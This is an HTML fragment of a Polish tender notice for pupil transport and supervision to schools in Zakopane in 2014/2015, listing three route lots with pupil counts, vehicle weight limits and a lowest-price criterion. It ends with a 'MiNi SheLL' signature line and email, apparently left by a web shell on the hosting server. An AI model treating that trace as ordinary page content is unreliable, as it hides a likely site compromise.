<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin   świadczenia usług : od  01.09.2014r. do 26.06.2015r. (  szacowana  ilość dni - 189  ) w godzinach ustalonych przez dyrektorów  szkół, z wyłączeniem okresu zimowej przerwy świątecznej, ferii zimowych, wiosennej przerwy świątecznej oraz niedziel i dni wolnych od zajęć szkolnych 
W przypadku odrabiania zajęć szkolnych  w dniach w których nie miały być świadczone usługi   lub odwołaniem  zajęć w dniach objętych świadczeniem usług,  dyrektor placówki pisemnie ( dopuszcza się formę faksu)  powiadomi wykonawcę  o odwołaniu  lub  odrabianiu zajęć na 2 dni wcześniej. Wykonawca zobowiązany jest we wskazanym dniu do  świadczenia  usługi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Krzeptówek do Gimnazjum nr 1, ul. Nowotarska 42 i z powrotem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2014/2015


Zakres zamówienia obejmuje : 

Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Krzeptówek do Gimnazjum nr 1, ul. Nowotarska 42 i z powrotem, tj. z Gimnazjum nr 1 na Krzeptówki - przewidywana ilość   uczniów - 17.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Szkoły Podstawowej nr 2 i z powrotem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2014/2015


Zakres zamówienia obejmuje 
Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Szkoły Podstawowej nr 2 i z powrotem, tj. z SP nr 2 na Gubałówkę - przewidywana ilość  uczniów-36 

 UWAGA!!!    Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton.  Jeżeli przewóz będzie się odbywał przez Kościelisko, koniecznym jest aby pojazd dojeżdżał do Furmanowej I..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Gimnazjum nr 1 oraz Szkoły Podstawowej nr 5 i z powrotem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2014/2015


Zakres zamówienia obejmuje : 
Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Gimnazjum nr 1 oraz Szkoły Podstawowej nr 5 i z powrotem, tj. z w/w szkół na Gubałówkę - przewidywana ilość  uczniów -33 

Uwaga!!! Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton. Jeżeli przewóz będzie się odbywał od strony Zębu, koniecznym jest aby pojazd dojeżdżał Gubałówka Kaplica.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com